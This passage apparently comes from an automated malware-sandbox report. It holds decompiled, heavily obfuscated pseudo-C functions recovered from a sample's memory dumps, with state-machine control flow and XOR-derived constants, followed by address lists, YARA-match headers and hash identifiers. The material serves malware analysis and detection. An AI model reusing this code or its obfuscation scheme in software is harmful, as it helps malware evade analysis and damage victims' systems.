				_v100 = _v100 ^ 0x00041cf0;
				_v144 = 0xf6edc9;
				_v144 = _v144 * 0x29;
				_v144 = _v144 >> 0xf;
				_v144 = _v144 >> 1;
				_v144 = _v144 ^ 0x00051e01;
				while(_t310 != 0x26f300b) {
					if(_t310 == 0x3aef716) {
						_t290 = E001DB677(_v156,  &_v88, _v172,  &_v96, _v108, _v124);
						_t362 =  &(_t362[4]);
						if(_t290 == 0) {
							L26:
							return _t348;
						}
						_t310 = 0x7fc7eaa;
						continue;
					}
					if(_t310 == 0x7562fb8) {
						_t292 =  *((intOrPtr*)(_t308 + 4));
						_t314 =  *_t308;
						_v92 = _t292;
						_v96 = _t314;
						_t294 = _t292 - 1 + _t314;
						while(_t294 > _t314) {
							if( *_t294 == 0) {
								break;
							}
							_t294 = _t294 - 1;
						}
						_t295 = _t294 - _t314;
						_v92 = _t295;
						if(_t295 == 0) {
							L16:
							_t310 = 0x3aef716;
							continue;
						}
						while(_v92 % _v116 != _v148) {
							_t230 =  &_v92;
							 *_t230 = _v92 - 1;
							if( *_t230 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t310 == 0x7fc7eaa) {
						_t297 = E001DE10A( &_v64, _v140,  &_v88, _v112, _v180);
						_t362 =  &(_t362[3]);
						asm("sbb ecx, ecx");
						_t310 = ( ~_t297 & 0xf9d2b2b1) + 0x89c7d5a;
						continue;
					}
					if(_t310 == 0x89c7d5a) {
						E001CAE43(_v88, _v100, _v144);
						goto L26;
					}
					if(_t310 != 0x8aa177e) {
						L23:
						if(_t310 != 0x4f66e9f) {
							continue;
						}
						goto L26;
					}
					_t310 = 0x7562fb8;
				}
				_t311 = _v128;
				_t288 = E001D0E97(_t311, _v184,  &_v16, _v164,  &_v36, _v132);
				_t362 =  &(_t362[4]);
				if(_t288 != 0) {
					_push(_t311);
					_push(_t311);
					_t305 = E001D5212(_v12);
					_t362 =  &(_t362[3]);
					 *_t350 = _t305;
					if(_t305 != 0) {
						E001E2C81(_v136, _v16, _v120,  *_t350, _v152, _v12);
						_t362 =  &(_t362[4]);
						 *((intOrPtr*)(_t350 + 4)) = _v12;
						_t348 = 1;
					}
				}
				_t310 = 0x89c7d5a;
				goto L23;
			}




























































                          0x001d4cfe
                          0x001d4d05
                          0x001d4d08
                          0x001d4d09
                          0x001d4d10
                          0x001d4d17
                          0x001d4d18
                          0x001d4d19
                          0x001d4d1e
                          0x001d4d29
                          0x001d4d2c
                          0x001d4d34
                          0x001d4d36
                          0x001d4d43
                          0x001d4d4a
                          0x001d4d4f
                          0x001d4d57
                          0x001d4d5c
                          0x001d4d6a
                          0x001d4d6f
                          0x001d4d75
                          0x001d4d7d
                          0x001d4d89
                          0x001d4d8e
                          0x001d4d98
                          0x001d4d9d
                          0x001d4da3
                          0x001d4dab
                          0x001d4db3
                          0x001d4dbf
                          0x001d4dc4
                          0x001d4dc8
                          0x001d4dd0
                          0x001d4dd8
                          0x001d4de0
                          0x001d4de8
                          0x001d4df0
                          0x001d4df8
                          0x001d4e00
                          0x001d4e08
                          0x001d4e10
                          0x001d4e18
                          0x001d4e20
                          0x001d4e25
                          0x001d4e2d
                          0x001d4e35
                          0x001d4e3d
                          0x001d4e45
                          0x001d4e4a
                          0x001d4e52
                          0x001d4e5a
                          0x001d4e62
                          0x001d4e6a
                          0x001d4e72
                          0x001d4e7a
                          0x001d4e89
                          0x001d4e8a
                          0x001d4e96
                          0x001d4e9c
                          0x001d4ea4
                          0x001d4eac
                          0x001d4eb8
                          0x001d4ebd
                          0x001d4ec3
                          0x001d4ecb
                          0x001d4ed8
                          0x001d4edb
                          0x001d4edf
                          0x001d4ee7
                          0x001d4eef
                          0x001d4ef7
                          0x001d4eff
                          0x001d4f09
                          0x001d4f0d
                          0x001d4f15
                          0x001d4f1d
                          0x001d4f25
                          0x001d4f2a
                          0x001d4f32
                          0x001d4f3a
                          0x001d4f42
                          0x001d4f4f
                          0x001d4f53
                          0x001d4f5b
                          0x001d4f63
                          0x001d4f73
                          0x001d4f77
                          0x001d4f7f
                          0x001d4f87
                          0x001d4f93
                          0x001d4f98
                          0x001d4fa2
                          0x001d4fa5
                          0x001d4fa9
                          0x001d4fb1
                          0x001d4fbe
                          0x001d4fc7
                          0x001d4fcb
                          0x001d4fd0
                          0x001d4fd8
                          0x001d4fe0
                          0x001d4fe8
                          0x001d4ff0
                          0x001d4ff8
                          0x001d5000
                          0x001d5005
                          0x001d500a
                          0x001d5012
                          0x001d501a
                          0x001d5022
                          0x001d502a
                          0x001d502f
                          0x001d5037
                          0x001d503f
                          0x001d5044
                          0x001d504c
                          0x001d505e
                          0x001d5062
                          0x001d5067
                          0x001d506b
                          0x001d5073
                          0x001d5085
                          0x001d5145
                          0x001d514a
                          0x001d514f
                          0x001d5205
                          0x001d5211
                          0x001d5211
                          0x001d5155
                          0x00000000
                          0x001d5155
                          0x001d5091
                          0x001d50e6
                          0x001d50e9
                          0x001d50eb
                          0x001d50f0
                          0x001d50f4
                          0x001d50fe
                          0x001d50fb
                          0x00000000
                          0x00000000
                          0x001d50fd
                          0x001d50fd
                          0x001d5102
                          0x001d5104
                          0x001d5108
                          0x001d5122
                          0x001d5122
                          0x00000000
                          0x001d5122
                          0x001d510a
                          0x001d511c
                          0x001d511c
                          0x001d5120
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001d5120
                          0x00000000
                          0x001d510a
                          0x001d5099
                          0x001d50ce
                          0x001d50d3
                          0x001d50da
                          0x001d50e2
                          0x00000000
                          0x001d50e2
                          0x001d509d
                          0x001d51ff
                          0x00000000
                          0x001d5204
                          0x001d50a9
                          0x001d51e5
                          0x001d51eb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001d51f1
                          0x001d50af
                          0x001d50af
                          0x001d517a
                          0x001d517f
                          0x001d5184
                          0x001d5189
                          0x001d519b
                          0x001d519c
                          0x001d51a4
                          0x001d51a9
                          0x001d51ac
                          0x001d51b0
                          0x001d51ce
                          0x001d51dc
                          0x001d51df
                          0x001d51e2
                          0x001d51e2
                          0x001d51b0
                          0x001d51e3
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /E$$UnE$2&6$Dm$F)#j$Z`^$pW$w$y;
                          • API String ID: 0-2659286561
                          • Opcode ID: eb232d921aa259a47cfbb9dac2200ea62c64db5d62b80a9a6b33fc8c66c40815
                          • Instruction ID: 70055e265873e9e61494ea911c62341e85ec57751459afde13185a55e3361b28
                          • Opcode Fuzzy Hash: eb232d921aa259a47cfbb9dac2200ea62c64db5d62b80a9a6b33fc8c66c40815
                          • Instruction Fuzzy Hash: 88D142B15087859BD368CF25C889A1BFBE2FBD4348F508A1EF58686260D7B1C949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A6070, Relevance: 10.9, Strings: 8, Instructions: 927COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: " fn( -> = { }truefalse{0x$)C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$H$_$_$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 0-4270729952
                          • Opcode ID: 3066395e0c1a9ae12f6713a85260a182118e230e821454c5db093604e8e3d7a2
                          • Instruction ID: 044740c6c753188e6e0f507790632a6ebf18f5c8c22ca38cce174a4df0ff6810
                          • Opcode Fuzzy Hash: 3066395e0c1a9ae12f6713a85260a182118e230e821454c5db093604e8e3d7a2
                          • Instruction Fuzzy Hash: 276226706183418FE7508EBDD450F5BB7E2AFE1364F04886EEA998B389E771D805CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A77B4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {recursion limit reached}{invalid syntax}, xrefs: 6E4A7DC6
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4A77C2, 6E4A7C19
                          • called `Option::unwrap()` on a `None` value, xrefs: 6E4A7B7C
                          • bool, xrefs: 6E4A7A4B
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 3839614884-433696047
                          • Opcode ID: a6d5dac60218fdba1003f7a03aea49bcd60d006b6a9b70f33fc1a805d745c8c4
                          • Instruction ID: dcbdcd6c853f1c790e531d6924238e17834d42c56d93a6c34e405a5a0783d61d
                          • Opcode Fuzzy Hash: a6d5dac60218fdba1003f7a03aea49bcd60d006b6a9b70f33fc1a805d745c8c4
                          • Instruction Fuzzy Hash: B7E1027160C7418FD324CFB8C494B6ABBE1AF96324F14866FD5998B3D9D334A846C782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D970A, Relevance: 10.4, Strings: 8, Instructions: 412COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001D970A(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				void* _t402;
				signed int _t469;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				void* _t493;
				signed int* _t548;
				void* _t549;
				signed int _t550;
				signed int _t551;
				void* _t553;
				void* _t554;
				void* _t557;

				_push(_a12);
				_t548 = _a4;
				_t549 = __edx;
				_push(_a8);
				_push(_t548);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t402);
				_v44 = _v44 & 0x00000000;
				_t554 = _t553 + 0x14;
				_v52 = 0x5f7282;
				_v48 = 0x89717d;
				_t493 = 0x98552f7;
				_v176 = 0x4ae891;
				_v176 = _v176 + 0xffff480f;
				_t477 = 0x5f;
				_v176 = _v176 * 0x1e;
				_v176 = _v176 + 0xef6c;
				_v176 = _v176 ^ 0x08b2a22c;
				_v96 = 0x9b836e;
				_v96 = _v96 * 0x42;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0xbf171f1c;
				_v188 = 0x39f5fb;
				_v188 = _v188 | 0xb5d3fd22;
				_v188 = _v188 * 7;
				_v188 = _v188 / _t477;
				_v188 = _v188 ^ 0x02a82dbf;
				_v164 = 0xc4d427;
				_t478 = 0x19;
				_v164 = _v164 * 0x1a;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 << 5;
				_v164 = _v164 ^ 0x000e3016;
				_v120 = 0x779f59;
				_v120 = _v120 / _t478;
				_t479 = 0x32;
				_v120 = _v120 / _t479;
				_v120 = _v120 ^ 0x00036599;
				_v128 = 0x7d8a0a;
				_v128 = _v128 | 0xae961094;
				_t480 = 0x6a;
				_v128 = _v128 * 0x66;
				_v128 = _v128 ^ 0xb9d94b58;
				_v56 = 0x401a4b;
				_v56 = _v56 * 0x63;
				_v56 = _v56 ^ 0x18c76e15;
				_v112 = 0xa51ead;
				_v112 = _v112 << 9;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xa3d6d40b;
				_v104 = 0x7aa304;
				_v104 = _v104 + 0x6bca;
				_v104 = _v104 / _t480;
				_v104 = _v104 ^ 0x000b8ef7;
				_v132 = 0x1148b5;
				_v132 = _v132 ^ 0xf20311a1;
				_v132 = _v132 | 0x9815079a;
				_v132 = _v132 ^ 0xfa15838b;
				_v88 = 0xf2e7cb;
				_t550 = 0x2b;
				_v88 = _v88 / _t550;
				_v88 = _v88 ^ 0x00094260;
				_v148 = 0x1a540c;
				_t481 = 0x55;
				_v148 = _v148 * 0x6f;
				_v148 = _v148 / _t481;
				_v148 = _v148 / _t550;
				_v148 = _v148 ^ 0x000ba5a7;
				_v160 = 0x50bc7c;
				_v160 = _v160 >> 5;
				_v160 = _v160 << 0xc;
				_v160 = _v160 << 0xc;
				_v160 = _v160 ^ 0xe30c8c54;
				_v72 = 0xb4813e;
				_v72 = _v72 + 0xeb4b;
				_v72 = _v72 ^ 0x00bd2f3e;
				_v80 = 0x45ed5f;
				_v80 = _v80 ^ 0xed608d07;
				_v80 = _v80 ^ 0xed2512e7;
				_v168 = 0xeb9f3b;
				_v168 = _v168 >> 5;
				_v168 = _v168 + 0x6d96;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x00009dae;
				_v68 = 0x5b4c56;
				_v68 = _v68 | 0x228a85d9;
				_v68 = _v68 ^ 0x22d2440e;
				_v60 = 0x613d83;
				_v60 = _v60 | 0xa9532b63;
				_v60 = _v60 ^ 0xa972f1ce;
				_v140 = 0x376939;
				_t163 =  &_v140; // 0x376939
				_t482 = 0x5d;
				_v140 =  *_t163 / _t482;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 + 0xffff8bdd;
				_v140 = _v140 ^ 0xfff86fc1;
				_v124 = 0x51f196;
				_v124 = _v124 + 0xffff9aeb;
				_t483 = 0x54;
				_v124 = _v124 / _t483;
				_v124 = _v124 ^ 0x000f7505;
				_v172 = 0x3012f5;
				_v172 = _v172 + 0x4134;
				_t551 = 0x31;
				_v172 = _v172 / _t551;
				_v172 = _v172 ^ 0x569dceb8;
				_v172 = _v172 ^ 0x56964419;
				_v76 = 0x97b467;
				_v76 = _v76 * 0x77;
				_v76 = _v76 ^ 0x468ec6d6;
				_v156 = 0x479670;
				_t484 = 0x1a;
				_v156 = _v156 / _t484;
				_v156 = _v156 << 2;
				_v156 = _v156 + 0xd9ad;
				_v156 = _v156 ^ 0x000d599b;
				_v180 = 0xbae7b9;
				_v180 = _v180 + 0xffffa92a;
				_v180 = _v180 + 0x4383;
				_v180 = _v180 + 0xffffeefb;
				_v180 = _v180 ^ 0x00b5d3cb;
				_v192 = 0x9a0431;
				_v192 = _v192 >> 8;
				_v192 = _v192 ^ 0x0f90ecbf;
				_v192 = _v192 + 0xffff1b33;
				_v192 = _v192 ^ 0x0f80084f;
				_v108 = 0x55fe36;
				_t485 = 0x74;
				_v108 = _v108 / _t485;
				_v108 = _v108 / _t551;
				_v108 = _v108 ^ 0x00038223;
				_v196 = 0xda517d;
				_v196 = _v196 + 0xffff96ec;
				_v196 = _v196 + 0xffffe8d5;
				_t486 = 0x44;
				_v196 = _v196 / _t486;
				_v196 = _v196 ^ 0x00010b42;
				_v116 = 0x376585;
				_t487 = 0x12;
				_v116 = _v116 / _t487;
				_v116 = _v116 + 0xffff0b99;
				_v116 = _v116 ^ 0x000eba6f;
				_v184 = 0xb4770e;
				_v184 = _v184 >> 9;
				_v184 = _v184 << 5;
				_t488 = 0x68;
				_v184 = _v184 / _t488;
				_v184 = _v184 ^ 0x000b25b3;
				_v92 = 0xc756a0;
				_v92 = _v92 + 0xffff476a;
				_v92 = _v92 * 0x11;
				_v92 = _v92 ^ 0x0d3f43a1;
				_v100 = 0xc46332;
				_v100 = _v100 | 0x1d93fa0a;
				_v100 = _v100 ^ 0x06f17946;
				_v100 = _v100 ^ 0x1b22c1d7;
				_v84 = 0xf98049;
				_v84 = _v84 | 0x1c19946c;
				_v84 = _v84 ^ 0x1cf939e5;
				_v64 = 0xaf1718;
				_v64 = _v64 * 0x64;
				_v64 = _v64 ^ 0x4461e439;
				_v136 = 0xde22af;
				_v136 = _v136 << 5;
				_v136 = _v136 | 0xbf66eb0e;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0004fef1;
				_v144 = 0xeb6203;
				_v144 = _v144 >> 8;
				_t489 = 0x4c;
				_v144 = _v144 / _t489;
				_v144 = _v144 >> 0xc;
				_v144 = _v144 ^ 0x000159a9;
				_v152 = 0x58cc79;
				_v152 = _v152 + 0x7b67;
				_v152 = _v152 >> 6;
				_t490 = 0x3e;
				_v152 = _v152 / _t490;
				_v152 = _v152 ^ 0x0007a5ba;
				goto L1;
				do {
					while(1) {
						L1:
						_t557 = _t493 - 0x7461a24;
						if(_t557 > 0) {
							break;
						}
						if(_t557 == 0) {
							E001E2A88(_v68, _v60, _v140, _v124,  *((intOrPtr*)(_t549 + 0x14)),  &_v40);
							_t554 = _t554 + 0x10;
							_t493 = 0x2469622;
							continue;
						} else {
							if(_t493 == 0x2469622) {
								E001E2A88(_v172, _v76, _v156, _v180,  *((intOrPtr*)(_t549 + 4)),  &_v40);
								_t554 = _t554 + 0x10;
								_t493 = 0xaef6787;
								continue;
							} else {
								if(_t493 == 0x38da483) {
									E001DDF47(_v128, _t548, _v56,  &_v40, _v112);
									_t554 = _t554 + 0xc;
									_t493 = 0x4cad5c1;
									continue;
								} else {
									if(_t493 == 0x4cad5c1) {
										E001CCE5A(_v104, _v132, __eflags, _v88, _v148, _t549 + 8,  &_v40);
										_t554 = _t554 + 0x10;
										_t493 = 0x92a4a1b;
										continue;
									} else {
										if(_t493 == 0x5df819a) {
											_push(_t493);
											_push(_t493);
											_t469 = E001D5212(_t548[1]);
											_t554 = _t554 + 0xc;
											 *_t548 = _t469;
											__eflags = _t469;
											if(__eflags != 0) {
												_t493 = 0x38da483;
												continue;
											}
										} else {
											_t562 = _t493 - 0x628664a;
											if(_t493 != 0x628664a) {
												goto L26;
											} else {
												E001CCE5A(_v64, _v136, _t562, _v144, _v152, _t549 + 0x20,  &_v40);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t548 != 0x00000000;
					}
					__eflags = _t493 - 0x92a4a1b;
					if(_t493 == 0x92a4a1b) {
						E001E2A88(_v160, _v72, _v80, _v168,  *((intOrPtr*)(_t549 + 0x1c)),  &_v40);
						_t554 = _t554 + 0x10;
						_t493 = 0x7461a24;
						goto L26;
					} else {
						__eflags = _t493 - 0x98552f7;
						if(__eflags == 0) {
							_t493 = 0x9a15b9c;
							 *_t548 =  *_t548 & 0x00000000;
							_t548[1] = _v176;
							goto L1;
						} else {
							__eflags = _t493 - 0x9a15b9c;
							if(_t493 == 0x9a15b9c) {
								_t548[1] = E001C46FA(_t549);
								_t493 = 0x5df819a;
								goto L1;
							} else {
								__eflags = _t493 - 0x9e9b60d;
								if(_t493 == 0x9e9b60d) {
									E001E2A88(_v184, _v92, _v100, _v84,  *((intOrPtr*)(_t549 + 0x28)),  &_v40);
									_t554 = _t554 + 0x10;
									_t493 = 0x628664a;
									goto L1;
								} else {
									__eflags = _t493 - 0xaef6787;
									if(_t493 != 0xaef6787) {
										goto L26;
									} else {
										E001E2A88(_v192, _v108, _v196, _v116,  *((intOrPtr*)(_t549 + 0x10)),  &_v40);
										_t554 = _t554 + 0x10;
										_t493 = 0x9e9b60d;
										goto L1;
									}
								}
							}
						}
					}
					goto L9;
					L26:
					__eflags = _t493 - 0x5c1c891;
				} while (__eflags != 0);
				goto L9;
			}



































































                          0x001d9714
                          0x001d971b
                          0x001d9722
                          0x001d9724
                          0x001d972b
                          0x001d972c
                          0x001d972d
                          0x001d972e
                          0x001d9733
                          0x001d973b
                          0x001d973e
                          0x001d974b
                          0x001d9756
                          0x001d975b
                          0x001d9763
                          0x001d9772
                          0x001d9775
                          0x001d9779
                          0x001d9781
                          0x001d9789
                          0x001d9796
                          0x001d979a
                          0x001d979f
                          0x001d97a7
                          0x001d97af
                          0x001d97bc
                          0x001d97c8
                          0x001d97cc
                          0x001d97d4
                          0x001d97e1
                          0x001d97e4
                          0x001d97e8
                          0x001d97ed
                          0x001d97f2
                          0x001d97fa
                          0x001d980a
                          0x001d9812
                          0x001d9817
                          0x001d981d
                          0x001d9825
                          0x001d982d
                          0x001d983a
                          0x001d983b
                          0x001d983f
                          0x001d9847
                          0x001d985a
                          0x001d9861
                          0x001d986c
                          0x001d9874
                          0x001d9879
                          0x001d987e
                          0x001d9886
                          0x001d988e
                          0x001d989c
                          0x001d98a0
                          0x001d98a8
                          0x001d98b2
                          0x001d98ba
                          0x001d98c2
                          0x001d98ca
                          0x001d98de
                          0x001d98e3
                          0x001d98ea
                          0x001d98f5
                          0x001d9904
                          0x001d9907
                          0x001d9913
                          0x001d991f
                          0x001d9923
                          0x001d992b
                          0x001d9933
                          0x001d9938
                          0x001d993d
                          0x001d9942
                          0x001d994a
                          0x001d9955
                          0x001d9960
                          0x001d996b
                          0x001d9976
                          0x001d9981
                          0x001d998c
                          0x001d9994
                          0x001d9999
                          0x001d99a1
                          0x001d99a6
                          0x001d99ae
                          0x001d99b9
                          0x001d99c4
                          0x001d99cf
                          0x001d99da
                          0x001d99e5
                          0x001d99f0
                          0x001d99f8
                          0x001d99fc
                          0x001d9a01
                          0x001d9a07
                          0x001d9a0c
                          0x001d9a14
                          0x001d9a1c
                          0x001d9a24
                          0x001d9a30
                          0x001d9a35
                          0x001d9a3b
                          0x001d9a43
                          0x001d9a4b
                          0x001d9a57
                          0x001d9a5a
                          0x001d9a5e
                          0x001d9a66
                          0x001d9a6e
                          0x001d9a81
                          0x001d9a88
                          0x001d9a93
                          0x001d9aa3
                          0x001d9aa8
                          0x001d9aac
                          0x001d9ab1
                          0x001d9ab9
                          0x001d9ac1
                          0x001d9ac9
                          0x001d9ad1
                          0x001d9ad9
                          0x001d9ae1
                          0x001d9ae9
                          0x001d9af1
                          0x001d9af6
                          0x001d9afe
                          0x001d9b06
                          0x001d9b0e
                          0x001d9b1c
                          0x001d9b21
                          0x001d9b2d
                          0x001d9b33
                          0x001d9b3b
                          0x001d9b43
                          0x001d9b4b
                          0x001d9b57
                          0x001d9b5c
                          0x001d9b62
                          0x001d9b6a
                          0x001d9b76
                          0x001d9b7b
                          0x001d9b81
                          0x001d9b89
                          0x001d9b91
                          0x001d9b99
                          0x001d9b9e
                          0x001d9ba7
                          0x001d9baa
                          0x001d9bae
                          0x001d9bb6
                          0x001d9bbe
                          0x001d9bcb
                          0x001d9bcf
                          0x001d9bd7
                          0x001d9bdf
                          0x001d9be7
                          0x001d9bef
                          0x001d9bf7
                          0x001d9c02
                          0x001d9c0d
                          0x001d9c18
                          0x001d9c2b
                          0x001d9c32
                          0x001d9c3d
                          0x001d9c45
                          0x001d9c4a
                          0x001d9c52
                          0x001d9c57
                          0x001d9c61
                          0x001d9c6e
                          0x001d9c79
                          0x001d9c7e
                          0x001d9c84
                          0x001d9c89
                          0x001d9c91
                          0x001d9c99
                          0x001d9ca1
                          0x001d9caa
                          0x001d9cb2
                          0x001d9cb6
                          0x001d9cb6
                          0x001d9cbe
                          0x001d9cbe
                          0x001d9cbe
                          0x001d9cbe
                          0x001d9cc0
                          0x00000000
                          0x00000000
                          0x001d9cc6
                          0x001d9e0f
                          0x001d9e14
                          0x001d9e17
                          0x00000000
                          0x001d9ccc
                          0x001d9cd2
                          0x001d9ddc
                          0x001d9de1
                          0x001d9de4
                          0x00000000
                          0x001d9cd8
                          0x001d9cda
                          0x001d9dac
                          0x001d9db1
                          0x001d9db4
                          0x00000000
                          0x001d9ce0
                          0x001d9ce6
                          0x001d9d81
                          0x001d9d86
                          0x001d9d89
                          0x00000000
                          0x001d9ce8
                          0x001d9cee
                          0x001d9d45
                          0x001d9d46
                          0x001d9d4a
                          0x001d9d4f
                          0x001d9d52
                          0x001d9d54
                          0x001d9d56
                          0x001d9d58
                          0x00000000
                          0x001d9d58
                          0x001d9cf0
                          0x001d9cf0
                          0x001d9cf6
                          0x00000000
                          0x001d9cfc
                          0x001d9d1b
                          0x001d9d20
                          0x001d9cf6
                          0x001d9cee
                          0x001d9ce6
                          0x001d9cda
                          0x001d9cd2
                          0x001d9d23
                          0x001d9d34
                          0x001d9d34
                          0x001d9e21
                          0x001d9e27
                          0x001d9f01
                          0x001d9f06
                          0x001d9f09
                          0x00000000
                          0x001d9e2d
                          0x001d9e2d
                          0x001d9e33
                          0x001d9ed0
                          0x001d9ed5
                          0x001d9ed8
                          0x00000000
                          0x001d9e39
                          0x001d9e39
                          0x001d9e3f
                          0x001d9ebf
                          0x001d9ec2
                          0x00000000
                          0x001d9e41
                          0x001d9e41
                          0x001d9e47
                          0x001d9ea6
                          0x001d9eab
                          0x001d9eae
                          0x00000000
                          0x001d9e49
                          0x001d9e49
                          0x001d9e4f
                          0x00000000
                          0x001d9e55
                          0x001d9e70
                          0x001d9e75
                          0x001d9e78
                          0x00000000
                          0x001d9e78
                          0x001d9e4f
                          0x001d9e47
                          0x001d9e3f
                          0x001d9e33
                          0x00000000
                          0x001d9f0b
                          0x001d9f0b
                          0x001d9f0b
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4A$9i7$9aD$K$_E$`B$g{$l
                          • API String ID: 0-2935683833
                          • Opcode ID: 389e72c3852df6f769d68ef1459b818342f1c290c6ce2fc85ac6829f5ed07867
                          • Instruction ID: 3383af603bfa27b6183844e7fb1f3268f900e11c4b438e2fe4977b71e9f87eb1
                          • Opcode Fuzzy Hash: 389e72c3852df6f769d68ef1459b818342f1c290c6ce2fc85ac6829f5ed07867
                          • Instruction Fuzzy Hash: 6D1200B1508780DFD368CF25C489A5BFBE2BBD4708F50891EE29A86260D7B59949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C84F0, Relevance: 10.4, Strings: 8, Instructions: 374COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E001C84F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v36;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v84;
				intOrPtr _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				void* _t344;
				void* _t382;
				void* _t390;
				intOrPtr _t396;
				void* _t398;
				signed int _t400;
				intOrPtr* _t402;
				void* _t404;
				signed char* _t417;
				signed char* _t444;
				intOrPtr* _t448;
				intOrPtr _t449;
				intOrPtr _t450;
				void* _t451;
				signed char* _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				void* _t461;
				void* _t462;
				void* _t464;

				_t402 = _a16;
				_t449 = _a4;
				_t448 = _a8;
				_push(_t402);
				_push(_a12);
				_push(_t448);
				_push(_t449);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t344);
				_v124 = 0xfb92e3;
				_t462 = _t461 + 0x18;
				_v124 = _v124 << 0xb;
				_v124 = _v124 ^ 0xdc971800;
				_t404 = 0xc335b1;
				_v136 = 0xc6cd3f;
				_v136 = _v136 + 0xffff881d;
				_v136 = _v136 ^ 0x00c6551c;
				_v220 = 0x39b606;
				_t453 = 0x60;
				_v96 = _v96 & 0x00000000;
				_v220 = _v220 * 0x27;
				_v220 = _v220 + 0xf4c5;
				_v220 = _v220 / _t453;
				_v220 = _v220 ^ 0x0017743f;
				_v140 = 0xe66565;
				_t31 =  &_v140; // 0xe66565
				_t454 = 7;
				_v140 =  *_t31 / _t454;
				_v140 = _v140 ^ 0x002d4afb;
				_v188 = 0x1644e4;
				_v188 = _v188 | 0x24adbee9;
